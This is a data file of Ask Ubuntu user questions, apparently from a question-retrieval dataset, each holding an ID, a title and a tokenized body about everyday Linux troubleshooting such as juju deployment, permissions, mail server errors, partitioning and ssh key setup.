409067	deploying a node.js app using juju	a little background . we are attempting to improve the deployment flow of our node.js application , and decided to investigate juju . i am attempting to deploy a small practice express app ( which does almost nothing ) to a local juju deployment using lxc . i have worked my way through this https : //juju.ubuntu.com/docs/howto-node.html but when i attempt to change the repository that the node-app charm points at using this command , juju set mark-app app_branch=https : //github.com/markwithers/juju-test the agent-state-info eventually changes to 'hook failed : `` config-changed '' ' . i 've worked my way through several proposed soluition to this problem , some even from this site , but none appear to work in my case . so , i then git cloned the node-app charm from here https : //github.com/charms/node-app and placed it in ~/charms i then edited the config.yaml in the charm to include the name of my github repository , and attempted to deploy from this local repository using the following command juju deploy -- repository=charms local : node-app i get the following error message in my terminal error can not get latest charm revision : charm not found in `` /home/mark/charms '' : local : precise/node-app which does n't make sense to me , as the repository is definitely in /home/mark/charms/node-app ! please help !
409071	unable to access jpcsp.jar	i cant get jpcsp to run it gives me this error- seal @ seal-dimension-4700 : ~ $ start-linux-x86.sh error : unable to access jarfile bin/jpcsp.jar i have java 7 installed idk whats wrong .
409072	after adding a node and rebooting it status is `` test failed ''	have installed and configured maas on 13.10 adding a node and rebooting it . dhcp do the job and it boot with pxe . but after that the node is powered down and the status is `` test failed '' error output failed [ 2/5 ] ( 00-maas-01-lshw 00-maas-02-virtuality )
409074	how to create a usb stick that does a complete unattended installation of xubuntu	we want to install several pc 's with xubuntu from a usb stick . the user may not be asked any questions . the installation must include kingsoft which is a dpkg . is this possible ? thanks joeri
409076	permission drwxrwxr -x	i need some help about permission . i had a permission drwxrwxr-x but i try to change the permission with chmod 755 /folder/ and after that i receive permission drwxr-xr-x but i would like to change it back to drwxrwxr-x . please can you help me with this ? filip
409082	ubuntu cloud live image password	i have just installed the ubuntu cloud live image on a virtual machine . after completing all the steps from the getting started document i managed to change my ip and access the login portal via this ip . as soon as i enter the suggested username and password i receive an error saying that the account or password is not valid . i am using the ubuntu/ubuntu123 username and password is this correct as per the document ? i am also 100 % sure that i completed the install as stated thanks
409085	is it possible to change the font of adobe flash player in google chrome ?	i suppose this might be an odd question , but the ubuntu font looks horrible in some adobe flash player applications in google chrome and therefore i was wondering if it was possible to change this font . i 'm not quite sure what font is being used , i just thought it was ubuntu 's . i 'm used to windows font for adobe flash player applications , which looks better than the font currently being used . i presume it 's using the same font my whole system is using ? if so ; how do i change that ? best regards , hexicidal .
409086	add and remove launcher icons from command line	i am building an ubuntu 12.10 vm using vagrant and chef , and i want to control which icons initially appear in the launcher . specifically i want to clear out all of the initial launcher icons , just leaving the start icon and nautilous , then add icons for a couple of applications i 'm installing with chef . adding the icons i can probably handle from other posts , but how can i remove existing icons using only the command line ?
409089	after restore ubuntu image hangs on black pointer	i need to install serveral pc 's with xubuntu . started with installing one and adding the applications i needed . i made an image with our imaging tool : zenworks . then i restored the partition on another pc with the same specs and it booted with only a black pointer ... . i have removed the uid 's from the /etc/fstab file and changed it by the /dev/sd ... made an image again and restored but again the black pointer . what am i missing ? kr , joeri
409090	ubuntu 12.04.3 lts installation mode `` install a command-line system '' missing ?	i just wanted to install a command-line system from my ubuntu 12.04.3 lts iso and the option for that is missing . am i missing something in the process or what could be the fault ? trying to use it within a virtualbox vm .
409091	vim and screen : background color not reset when exiting vim	i use vim in a screen session . whenever i end editing a file and exit vim the background of my terminal stays the same as in vim , rather than resetting correctly as it does when i am not using screen . one way i found to reset the colors is to use the cls command i have defined as alias cls='printf `` \033c '' and then pressing a couple of times ctrl+l i was wondering if there is some setting i can change either in .bashrc , .vimrc or .screenrc to make things work properly . so far i have added this to my .screenrc to make sure vim colors are the same both when in screen sessions and when not : caption always `` % { = kc } % n -- % t -- % -21= % { = .m } % d % d. % m. % y % 0c '' attrcolor b `` .i '' termcapinfo xterm 'co # 256 : ab=\e [ 48 ; 5 ; % dm : af=\e [ 38 ; 5 ; % dm' defbce `` on ''
409093	how to make a home media/file server with ubuntu sever , next to ubuntu 12lts	so i 'm a complete newbie . i have a pc with ubuntu 12lts . i would like to share files and media files with my family members in a local network ( including a sony tv ) . what about partitioning ( swap ) ? will a dual boot ubuntu 12 desktop and ubuntu 13 server give problems ? what are the steps to follow , what are the hot spots during the installation , what kind of file servers , media servers do i need , what about security ? all input wellcomed .
409094	how to install .exe file on ubuntu without using wine ?	i have a matlab installation file in .exe format . is it possible to install matlab on ubuntu without using wine ?
409099	how can i find application using hard drive ?	my hard drive is being used all the time ( i can hear it and the hd led is flashing ) . how can i find the application that is causing this disk access ? is there something like top which shows the hd usage for each application ?
409102	lost encrpytion passphrase for external hd	so i encrypted my external hd using the `` luks + ext4 '' type on ubuntu 13.04 , on this computer and on this account , a couple of weeks ago . i know the point of encryption is that you can not retrieve the files without the passphrase , but is there a way that i can recover the key ? i am hoping there is some sort of cache saved or program i can use . i did make the passphrase very strong ( about 17 characters of near randomness ) however i do remember most of the passphrase . i am so close to remembering it . if there is no way to recover it , would you recommend setting the hd aside for maybe the future when it is possible to recover ? i have about a year of home videos i would hate to lose .
409108	lastest ubuntu is stack in the loading screen	i 'm using an old thinkpad computer ( z-260 ) . last month my windows died and i could not be botherd to fix it ( blue dead screen ) , so i installed ubuntu . yestaday i have decided do extend the ubuntu partition because i did n't have enough space to install packeges . gparted said that there is a problem with the windows partition and that i need to run a chkdsk . so , i loaded a live usb with windows sp3 instalation and run it on the windows partition . the windows still didnt work , but using live usb with ubuntu ( the same one ) , the gparted did work and extended my ubuntu on the free space in the broken windows . then my booting was resetted to the windows boot ( and did not work ) , so i used the live usb of ubuntu to use boot-repare . after that , i got the booting window of ubuntu- and run it , the ubuntu worked . today- i tried to open the ubuntu again ( i got the right booting menu ) , but it loaded and loaded and didnt open , when i tried to moov my mouse , my pointer was in a shape of x. i tried the boot-repare again , and again with changing the proparties of it- but nothing . it hit me that the booting is not the problem . what shuold i do ?
409111	export path does n't work correctly	i have a problem with $ path export . the only place i found where i modify $ path is /etc/environment : android_home= '' /opt/adt/adt-bundle-linux-x86_64-20130522/sdk '' project_home= '' /home/tomaszchabinka/dokumenty/tempfile/android_stb '' path= '' /opt/gradle-1.10/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' but when i type in terminal echo $ path it returns : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/lib/jvm/jdk1.7.0/bin i do n't have /usr/lib/jvm/jdk1.7.0/bin directory so i do n't understand why my $ path export does n't works and where does /usr/lib/jvm/jdk1.7.0/bin come from . also $ android_home and $ project_home exports correctly ; only $ path export does n't work . can anyone help me ?
409112	ca n't install google chrome on ubuntu 12.04	the termial say 's package google-chrome-stable needs to be reinstalled but ca n't find it in the archives . what do i need to do ? i keep getting errors .
409120	postfix maildir permission error - can not recieve mails	i have a server running with postfix , courier , squirrelmail and virtual users located in mysql . everything works fine except receiving mail from the internet . the log file shows ; postfix/virtual [ 10639 ] : warning : check_dir_size : can not open directory : /home/vmail/domain/info/ postfix/virtual [ 10639 ] : warning : maildir access problem for uid/gid=5000/5000 : create maildir file /home/vmail/domain/info/tmp/1390329492.p10639.rob : permission denied postfix/virtual [ 10639 ] : warning : perhaps you need to create the maildirs in advance to me it seems like a problem with the permissions but there may of course be other reasons . the directory `` info '' ( which is also the user ; info @ domain ) exists and has data in it . the tmp folder pointed out in the log has the following permissions ; drwxr-xr-x 2 vmail vmail 4096 jan 22 11:54 tmp internal mail sent with mailx are delivered properly to the users mailbox and squirrelmail logs in just fine . any hints would be much appreciated !
409121	what does cd - ( cd hyphen ) do ?	i typed cd - in terminal by mistake today , and i got an error saying : bash : cd : oldpwd not set and unfortunately , man cd does n't exist . no manual entry for cd what does it actually do ?
409124	why does n't 32-bit eclipse run in 64-bit ubuntu ?	i installed 64-bit ubuntu 12.04 on my desktop and the eclipse kepler 32-bit version , considering it should support backwards compatibility with 32-bit apps , but it does not . after a lot of attempts nothing worked out like running it from the terminal , reinstalling jdk , etc . ultimately i installed 64-bit eclipse , it runs flawlessly , and then i installed adt-20.0.3 and android sdk which gives me the error : unable to find adb version..error 13 , i tried the solutions from googling like adding path in .bashrc file [ environment variable ] and permission to to adb directory chmod 777 but it did n't work out . i think i just might have to revert back to the 32-bit version of eclipse . please explain why there are so many issues with 64-bit eclipse not being compatible with 32-bit apps .
409125	problem logging into ubuntu 12.10 on hp lapto with nvidia after upgrade	i have been having a problem with ubuntu on my hp pavilion tx2000 laptop . i installed ubuntu 12.04 last summer and dual booted it alongside win7 for months . back in november i was installing upgrades to software packages when i decided to update the graphics drivers . this resulted in me not being able to login . it would get stuck at the ubuntu dots splash screen . i purged the nvidia settings , installed xorg again and reconfigured lightdm but it did not help . so i then decided to upgrade the release to 12.10 . this helped a bit , i could get to the login screen and login but the desktop was missing , no dash , no task bar , just my wallpaper . i tried to recongigure lightdm again and installed ccsm and checked the plugins regquired for unity , which were all unchecked . now when i boot i have just a black screen and no login screen at all . any help would be greatly appreciated . i have used for many years on different pc 's but consider myself a beginner with fixing issues . i am confident in terminal etc but not familiar with all commands/ packages required .
409127	updates of manually installed packages	if i install a package from an deb-file , because i want a newer version than available in the repositories , will they get updated when in the ubuntu repositories more recent versions are available ?
409128	how to extend an ntfs partition	i have a linux and a windows partition and want to extend the windows one . i already decreased the size of the linux partition via gparted , the problem is that the unused space is on the end of the disc , so i can not add it to the windows partition which is before the linux one . can anyone explain me how i can re-allocate the partitions , so that i can extend the ntfs one ? i could n't find any way doing this , at least not in gparted . here is a screenshot explaining my problem : /dev/sda2 is my windows partition , which i want to extend /dev/sda3 is my linux partition , which i made smaller already .
409130	change operating system language of ubuntu after insallaled	i recently installed ubuntu 12.04 in my pc . its running fine . but unfortunately i have been select albanian language . actually i want to english ( us ) . can i change albanian to english ( us ) as my os ? ? please give any idea .
409136	creating a web page in ubuntu and accessing it through ethernet from another ubuntu user	i 'm creating a webpage in ubuntu , in which simple files such as .txt can be uploaded . now , i want to transform my laptop into an ubuntu web server , through which any other ubuntu or windows user can access that specific web page through ethernet connection . how can i make my laptop having ubuntu into such a web server ? how can i access that web page from another ubuntu or windows user via ethernet ? what are the necessary configurations or settings required for that ?
409141	wireless keyboard trust 16593 not working	i have a wireless keyboard/mouse combo , a german trust 16593 . while the mouse is working perfectly , the keyboard does nothing . however , it does work when connected to a windows pc . the reciever does show up as 040b:2014 weltrend semiconductor in lsusb . anyone got this specific keyboard to fly under ubuntu 13.10 ?
409142	unable to switch users in 13.10	since i upgraded to ubuntu 13.10 ( from 13.04 ) , it 's not always possible to switch users : a black screen and an arrow are displayed when an attempt is made to switch from a logged-in account to another one . my desktop is unity . i have n't installed another one . display manager is lightdm . the system does not freeze , it 's possible to escape by going into a console with ctrl-alt-f1 and kill the current session to return to the login screen . still , it 's annoying . i have tried rebooting after removing .xauthority files , including /var/lib/lightdm/.xauthority , but the problem comes back after a day or two . do you have any idea what 's going on ?
409143	how to unlock maxtor blackarmor portable hard drive disk	i have a maxtor portable hard drive disk . i ca n't unlock it . it has a launcher.exe file . is there any unlock utility ?
409146	is there a fix for acer lapton ubuntu 13.10 microphone ?	my laptop is the acer aspire timelinex t ( honestly i forgot the last digits ) . when using the microphone i have to turn it up to the extremes and it gets a lot of static interferance from it . i have tried various different external microphones those i did n't have to turn up to the extreme but it does have a lot of static . can someone help me i have multiple things that people want me to join in for video chats and i just sit there looking dumb having to type everything or use a phone and calling someone in it having me on speaker phone . p.s . i am using 64 bit version
409156	using mimeopen to set default application outputs `` cancelled ''	i 'm attempting to follow the steps here to change the the default application that opens a blender file . i input the command mimeopen -dmime my_file.blend and when prompted for the application , i input the path to a new version of blender . note : i have used this method once to successfully associate .blend files with an older version of blender , but i ca n't switch the association now . it just outputs cancelled . ~/desktop $ mimeopen -d my_file.blend gtplease choose a default application for files of type application/x-blender 1 ) home ( home-usercreated-1 ) 2 ) other ... use application # /home/garrett/blender-2.69-2aeb492-linux-glibc211-x86_64/blender cancelled ~/desktop $ i also tried using this method to change associations of .txt files to /usr/bin/gedit with the same result . what 's going wrong ? i 'm on ubuntu 13.10 and using mimeopen 0.15 ( the default ) .
409160	configure automount behaviour for specific hard drive or partition	background : my previous laptop had space for a second internal hard drive . due to the size of my photo collection i purchased a second hard drive and created one partition to hold my photos . i used fstab to permanently mounted the second internal hard drive in /home/user/pictures my new laptop only has space for one hard drive so the drive with my photo collection is now used as en external usb drive . it is not handy to carry around , so i do n't want to mount it permanently in /home/user/pictures . behavior : ideally i want the drive to auto mount in /home/user/pictures when the drive is connected . i found a way to to this in fstab but it only works if the drive is connected at boot . otherwise i would need a way to trigger a `` mount -a '' command when the drive is connected . how could this be done ? are there more elegant ways to achieve this behavior ?
409161	how do i create an bootable win 7 usb in ubuntu ?	iá¸ż using an eee pc and dropped my win device . i dont have a disk drive as y'all may know.. i just want to reload my windows 7 from a bootable usb , which i wan na create on ubuntu 13.04 . after that i wan na reinstall ubuntu next to win7 . iá¸ż not that kinda hardware person who fixes it in a moment . so if you guys could explain it easily and usuable , you will help me a lot . thanks a lot from holland
409164	qdbus help - quit screenlocker	`qdbus` can not be called in kubuntu saucy i can not comment yet , and as i have a question , i can not post it as solution ! what 's the alternative for qdbus ? qt4-default wants to install 37 packages . i want to send a command to the kde screenlocker so it quits , because i want to unlock all my machines at the same time by ssh . david .
409170	create a bootable ubuntu backup partition	this question is asked many times but i have n't got the right answer . what i want is to create a partition where i backup my current ubuntu partition that appears in the grub menu . if one day my ubuntu wo n't to start i lunch the backup partition and voila my system is restored . currently i use clonezilla but the problem is i must have always on me a usb key that contains clonezilla . edit : df -h /dev/sda5 55g 39g 14g 74 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 997m 4,0k 997m 1 % /dev tmpfs 202m 1,2m 200m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1006m 8,0k 1006m 1 % /run/shm none 100m 36k 100m 1 % /run/user parted -l nothing
409171	how do i install fglrx on an amd kaveri machine ?	i have recently built a kaveri machine , but i 'm having trouble getting the fglrx drivers up and running . i can install them , but the lightdm screen will simply be black . the machine has an amd a10-7850k apu and an asus a88xm-plus motherboard . i have done tests using both ubuntu 13.10 and 14.04 . in the end i do n't mind using either . i have tried the following : install the regular fglrx-updates - > no result install the xorg-edgers ppa - > no result manually install the official amd beta version via this cchtml guide - > no result remove all kernels and install the 3.12 kernel from the mainline ppa , and install the official amd beta version against that kernel - > no result it must be possible , because phoronix has tested fglrx against the exact same apu on a slightly different motherboard of the same series , except they did n't provide any instructions on the installation bit . any help is welcome , as the internet is currently a barren desert when it comes to amd 's new apu on linux .
409172	software that shows installed software according to licence of the applications	i want a software that shows all installed applications using various sorting options like date of installation , size of application etc . most importantly license of the application . i want to ensure that i do n't add proprietary software to usb drives and/or cds which would be illegal . i would also like to replace proprietary software with floss software as far as possible . so i need a software that could sort out applications for me . edit : usc and synaptic are both able to show license of software . also it looks like all proprietary software are included in multiverse repository . so there must be a command to find the license and/or to find which repository a software belongs to .
409174	how to unity avoid in preseed file ubutu12.04	i wrote a preseed file for the ubuntu 12.04 installation . but i want to avoid the unity-desktop . is there any way to do this ? and another thing is i tried to use cryptic password and generated by printf ubuntu | mkpasswd -s -m sha-512 the result is $ 6 $ jztxsnf0gp $ fawmaqxm2qfdzykaknfs9neu48s6z1kxto6wi55qf//tbeh4k//0ixs01yb.ma3euk1zlxb5lbq8y0j.jney9 . i pasted this in the preseed file . but after the installation , when i tried to login using the password ubuntu i ca n't login . is there anything i 'm doing wrong ?
409175	disable hud does n't work	i do n't use the hud ( alt-key ) , and tried do disable it by setting a strange key combination in the keyboard settings menu ; but it reset after a while ( not sure when , maybe after reboot , maybe after an update ) . anyways : i used ccsm to fully disable the function , but for some strange reason , after a while , it works again , and i have to disable it all over again . i 'm currently using ubuntu 13.10 ; but it also happened in 13.04 . i do n't know the cause , maybe someone does , but maybe it 's also possible to disable the hud function via commands ? this way i would be able to just put it in a script at startup .
409177	ubuntu 12.04 opening dialog hangs too long when opening files , folders , anything ?	every time i open any file , or folder , basically anything , there is an opening dialog on my panel , like opening this and that . and even when file is opened , opening dialog hangs there for another 5-10 seconds . is there a way to remove , or prevent opening dialog ? take a look at screenshot . i clicked on home , and my home folder is opened instantly . but there is a tab that says `` opening aleksandar '' and hangs there for another 6-7 seconds . can i prevent this somehow ?
409178	usb ups driver determination	hy , i have powerbank electronic ups model : nv-1000 usb http : //powerbank.com.tw/products.php ? cat=64 & lang=en it comes with redhat driver upsmart-s-1.1-aug07.02.i386.rpm but no ubuntu/debian drivers . what driver to use ? my outputs : lspci `` bus 004 device 002 : id 0665:5161 cypress semiconductor usb to serial '' dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 0.741333 ] 00:06 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a if i use generic hid driver nut output is : upsdrvctl start network ups tools - ups driver controller 2.6.3 network ups tools - generic hid driver 0.35 ( 2.6.3 ) usb communication driver 0.31 no matching hid ups found i want to send term signal if power out operating system is ubuntu linux 12.04.3 kernel and cpu linux 3.8.0-35-generic on i686
409180	telugu fonts not rendered correctly in libreoffice	words like padmini , smarana etc where the 'm ' is below , here the next letter ( ni and ra in the examples ) is written over the previous m. spacing is incorrect . these are just two examples , essentially rendering of all such half letters is incorrect . these are rendered correctly in hindi though . seems like a problem specific to telugu . its also a problem specific to libreoffice , this renders perfectly in say google docs ... ubuntu 13.10 , libreoffice 4.1.3 , telugu inscript ( m17n ) layout ( tried other layouts too ) , lohit telugu font ( tried pothana2000 and akshar fonts too ) . i 'm very new to ubuntu but need to type telugu very frequently , some easy solutions will be appreciated .
409181	whenever i am trying to open firefox , it shows a massage `` firefox is already open but not responding ''	i am trying to open firefox browser in my system . but every time it is showing message that `` firefox is already open but not responding . please restart the system '' . even after restarting the system it showing the same message , when i again try to open it .
409182	`` physical '' windows 7 in vmware	i 'm on an i5-25-something and 8 gb ram , running ubuntu , 64 bit , 3.11.0-12 generic and want to run my windows 7 partition in a vm workstation . i 'm somewhat uncertain as to how to set up the virtual machine . i have vmware workstation 10.0.1 build-1379776 and the following partition setup : disk /dev/sda : 64.0 gb , 64023257088 bytes 255 heads , 63 sectors/track , 7783 cylinders , total 125045424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c1a8b device boot start end blocks id system mount /dev/sda1 * 2048 125045016 62521484+ 83 linux / disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x07407b0c device boot start end blocks id system mount /dev/sdb1 2048 2459647 1228800 7 hpfs/ntfs/exfat ( windows system_drv ( it 's a thinkpad ) ) /dev/sdb2 2459648 197772147 97656250 7 hpfs/ntfs/exfat ( windows 7 ) /dev/sdb3 197773310 976771071 389498881 5 extended /dev/sdb5 197773312 976771071 389498880 83 linux /home i have created a new vm as root , told it to use sdb2 . when i boot the vm , i get a grub rescue line . i suppose from this https : //www.vmware.com/support/ws5/doc/disks_dualmult_ws.html # wp1046601 and http : //fds-team.de/cms/articles/2013-12/use-a-real-windows-7-partition-in-virtualbox-kvm-vmware-player-u.html that i somehow need to create an mbr but i 've failed at this or rather at using it so far . maybe someone with a grasp of what i 'm doing could digest the tutorial for me and help get this thing running on my partition configuration ? i want to not have to reboot to use autocad 2014 and am hoping for decent usability in a vm , albeit i do n't know what settings ( scsi ? 6 gb ram for the vm ? ) would be a good choice nor whether this is even worth the effort and i wo n't be too unhappy with the vm-performance to ever use it . any comment , suggestion or advice appreciated . thanks , philipp
409184	shell : echo multi character string	lets say i have strings like this : /somefolder/andsubfolder/my_first_text.txt /somefolder/andsubfolder/my_second_text.txt and i want to create a loop to echo my_first_text my_second_text after some research i found out that the cut command is not abled to do so . i think awk might be an option but i did not fully understand how to get it working properly on this example ... so any help would be very appreciated .
409185	unable to create a file in a certain location on ubuntu	i 'm trying to create a text file as below ... mysql -- host=localhost -- user=root -- password=11111 database1 < < eof select * from table where status = 1 into outfile '/home/user/feeds/file.txt' fields terminated by '|' enclosed by '' lines terminated by '\n' eof which displays an error ; error 1 ( hy000 ) at line 1 : ca n't create/write to file '/home/user/feeds/file.txt ' ( errcode : 13 ) i tried creating the file in /tmp/file.txt and it works , but then again i ca n't move nor delete the file as it says ; operation not permitted any ideas ?
409186	scroll mouse - > scroll up screen instead browse history	i 'm new with z-shell , i got a problem that when i scroll my mouse , it shows me the zsh-history , but what i really wan na is to scroll up the screen , just like i drag the scrollbar on the side . seems by default mouse wheel is also mapped just like up/down key ^ [ [ a and ^ [ [ b on the keyboard . any idea how to congiure it ? thanks .
409190	problem hidden alt + tab , unity minimize bug ? ( ubuntu 13.10 )	i 'm running ubuntu 13.10 . often when i have multiple windows of the same type open , when i click their unity icon twice to select windows , only one window will show . the rest will have a space on the screen and can be highlighted by mousing over , or clicking , but they are invisible . this would be better demonstrated with a screen shot : note that the left window outline is only visible when moused over .
409194	sub-process /usr/bin/dpkg returned error code ( 1 )	i run the command sudo apt-get -f install to fix the libraries . it started downloading fglrx-experimental-13_2 % 3a13.101-0ubuntu0.0.2_amd64.deb and instead of installing given the following error ( reading database ... 145874 files and directories currently installed . ) unpacking fglrx-experimental-13 ( from ... /fglrx-experimental-13_2 % 3a13.101-0ubuntu0.0.2_amd64.deb ) ... one or more files have been altered since installation . uninstall will not be completed . see /etc/ati/fglrx-uninstall.log for details . dpkg : error processing /var/cache/apt/archives/fglrx-experimental-13_2 % 3a13.101-0ubuntu0.0.2_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/fglrx-experimental-13_2 % 3a13.101-0ubuntu0.0.2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i also tried following command but these also did n't worked sudo apt-get update sudo apt-get upgrade edit : here is the /etc/ati/fglrx-uninstall.log *** amd catalyst ( tm ) proprietary driver uninstall log 2014-01-22 14:51:20 *** md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_cs.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_da_dk.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_de.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_el_gr.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_es_es.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_fi_fi.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_fr_fr.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_hu_hu.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_it_it.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_ja.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_ko_kr.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_nl_nl.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_no.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_pl.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_pt_br.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_ru_ru.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_sv_se.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_th.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_tr_tr.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_zh_cn.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/amdcccle_zh_tw.qm . file is missing from system /usr/share/ati/amdcccle/qt_cs.qm . file is missing from system /usr/share/ati/amdcccle/qt_da.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_de.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_es.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_fr.qm . file is missing from system /usr/share/ati/amdcccle/qt_hu.qm . file is missing from system /usr/share/ati/amdcccle/qt_ja.qm . file is missing from system /usr/share/ati/amdcccle/qt_ko.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_pl.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_pt.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_ru.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_sv.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_zh_cn.qm . md5sum integrity check failed for /usr/share/ati/amdcccle/qt_zh_tw.qm . file is missing from system /usr/share/ati/lib64/libqtcore.so.4 . file is missing from system /usr/share/ati/lib64/libqtgui.so.4 . file is missing from system /usr/lib/fglrx/switchlibgl . file is missing from system /usr/lib/fglrx/switchlibglx . file is missing from system /usr/lib/libfglrx_dm.a . file is missing from system /usr/lib/fglrx/fglrx-libgl.so.1.2 . file is missing from system /usr/include/gl/glati.h . file is missing from system /usr/include/gl/glxati.h . file is missing from system /usr/include/ati/gl/glx.h . file is missing from system /usr/include/ati/gl/glxext.h . file is missing from system /etc/modprobe.d/blacklist-fglrx.conf . file has been removed , //usr/lib/libgl.so.1.2 , since last install . one or more files have been altered since installation . uninstall will not be completed . to force uninstall , removing all installed files without verification , run /usr/share/ati/amd-uninstall.sh -- force . forcing uninstall is not recommended and may cause system corruption .
409195	no file or picture opening in ubuntu 12.04	today , each and every file and photo i tried to open showed up the message you do not have the permissions necessary to view the contents of `` file '' . i can neither open or copy them . in properties section for each , it shows size , location , type unknown as well as permissions as unknown . what should i do ? drw -- -- -- - 3 prashant prashant 4096 jan 22 15:31 desktop drw -- -- -- - 7 prashant prashant 4096 jan 18 13:08 documents drw -- -- -- - 7 prashant prashant 4096 jan 22 02:32 downloads drw -- -- -- - 2 prashant prashant 4096 jan 11 12:03 dwhelper -rw -- -- -- - 1 prashant prashant 8445 jan 9 08:18 examples.desktop drw -- -- -- - 2 prashant prashant 4096 jan 9 08:20 music drw -- -- -- - 3 prashant prashant 4096 jan 20 18:22 pictures drw -- -- -- - 2 prashant prashant 4096 jan 9 08:20 public -rw -- -- -- - 1 prashant prashant 1972 jan 22 14:41 softether-vpn-server -rw -- -- -- - 1 prashant prashant 5301222 jan 22 15:00 softether-vpnserver-v4.04-9412-rtm-2014.01.15-linux-x64-64bit.tar.gz , drw -- -- -- - 2 prashant prashant 4096 jan 9 08:20 templates , drw -- -- -- - 2 prashant prashant 4096 jan 9 08:20 videos , drwx -- -- -- 5 prashant prashant 4096 jan 22 16:12 vpnserver chmod 600 * chmod 700 vpnserver chmod 700 vpncmd
409198	which ubuntu version has more support here and on the forums ? 12.04 or 13.10 ?	i am planning to install ubuntu , but i want something that is stable and i want to count on the support of the community as well because i need it a lot . my computer is not a standard ( meaning i chose the main pieces and there are very few like it on the market ) and so support is usually a probem , which i hope to solve by installing the most common and well-known ubuntu distro . should i go for the lts or for the latest version ? if i go for the lts , will i be capable of installing and testing new apps and programs released in the future ?
409203	error reading manpages	felipe @ ubuntu : ~ $ man socket man : it is impossible to solve / usr/share/man/es/man2/socket.2.gz . no such file or directory man : it is impossible to solve / usr/share/man/es/man7/socket.7.gz . no such file or directory i can read the man in english but that error message should not be there . it appears when i removed the manpages-es ( bad translation ) .
409204	how to clone to a smaller harddisk ?	how to clone a harddisk to a smaller sized one . clonezilla is great but it does n't support such functionality . also dd and partimage do n't support this demand . rsync will not copy the mbr since an mbr is not a file . i need to clone a hdd not to take a backup , so rsync is not an acceptable answer . any suggestions ?
409205	how to extend partition with free space that is before it usgin gparted ?	i have my windows partition ( c ) , 9gb of free space and then i have my linux partition . how do i expand my linux partition with that 9gb of free space using gparted and without losing everything i have ? if this is not possible , is there another tool ( safer one ) that i can use ?
409209	compiling a c++ program	i tried to compile a cpp program through the terminal on 13.04 but got this message : npg @ npg-ideapad-s210 : ~ $ gcc -o comp-lcg.cpp the program 'gcc ' can be found in the following packages : * gcc * pentium-builder try : sudo apt-get install < selected package > what should i do ?
409210	use keyboard , video and mouse on a headless ubuntu	need help in using a monitor , keyboard and mouse on a headless ubuntu as and when needed , to detail , at home , i have ubuntu 12.04 running on headless mode , now as and when i get my monitor and mouse free from the other system that my brother uses , i would want to hook it up to the ubuntu and use it temporarily.. any help is appreciated ...
409212	ca n't get ssh to work	i tried to set up an ssh connection using an rsa key but i ca n't get it working . my permissions are ok , i set in the sshd_configfile that it has to use a public key for authentication , i of course created the key and appended it to ~/.ssh/authorized_keys . what is wrong ? i 'm already trying to fix this half a day . this is my output when i try to connect : ssh -vvv steven @ 192.168.0.2 openssh_6.2p2 ubuntu-6ubuntu0.1 , openssl 1.0.1e 11 feb 2013 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 192.168.0.2 [ 192.168.0.2 ] port 22. debug1 : connection established . debug3 : incorrect rsa1 identifier debug3 : could not load `` /home/steven/.ssh/id_rsa '' as a rsa1 public key debug1 : identity file /home/steven/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/steven/.ssh/id_rsa-cert type -1 debug1 : identity file /home/steven/.ssh/id_dsa type -1 debug1 : identity file /home/steven/.ssh/id_dsa-cert type -1 debug1 : identity file /home/steven/.ssh/id_ecdsa type -1 debug1 : identity file /home/steven/.ssh/id_ecdsa-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.2p2 